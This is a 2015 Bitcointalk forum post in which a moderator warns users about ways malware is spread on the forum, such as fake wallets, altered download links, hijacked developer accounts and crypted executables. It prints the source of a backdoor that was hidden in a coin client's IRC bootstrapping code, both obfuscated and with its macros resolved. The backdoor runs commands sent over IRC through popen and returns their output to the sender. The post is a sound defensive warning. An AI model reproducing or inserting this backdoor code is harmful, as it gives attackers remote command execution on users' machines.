Bitcoin Forum
March 24, 2017, 12:26:36 PM *
News: Latest stable version of Bitcoin Core: 0.14.0  [Torrent]. (New!)
 
   Home   Help Search Donate Login Register  
Pages: [1]
  Print  
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 11095 times)
mprep
Moderator
Legendary
*
Offline Offline

Activity: 1456


In a world of peaches, don't ask for apple sauce


View Profile
January 26, 2015, 04:15:52 PM
 #1

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Main thread: https://bitcointalk.org/index.php?topic=935898.0


Advertisment:
           ▄▄▄███████████▄▄▄
       ▄▄█████████████████████▄▄
     ▄███████████████████████████▄
   ▄███████████████████████████████▄
  ▄█████████████████████████████████▄
 ▄███████████████████████████████████▄
▄█████████████████████████████████████▄
███████████████████████████████████████
███████████████████████████████████████
███████████████████████████████████████
▀█████████████████████████████████████▀
 ▀███████████████████████████████████▀
  ▀█████████████████████████████████▀
   ▀███████████████████████████████▀
     ▀███████████████████████████▀
       ▀▀█████████████████████▀▀
           ▀▀▀███████████▀▀▀
Unofficial Bitcointalk API - get post, board, topic info
Bitcointalk Post Iconizer - custom post editing buttons
  |  Websites advertised in my signature are not endorsed by me.
  |  Advertise in my signature
Pages: [1]
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!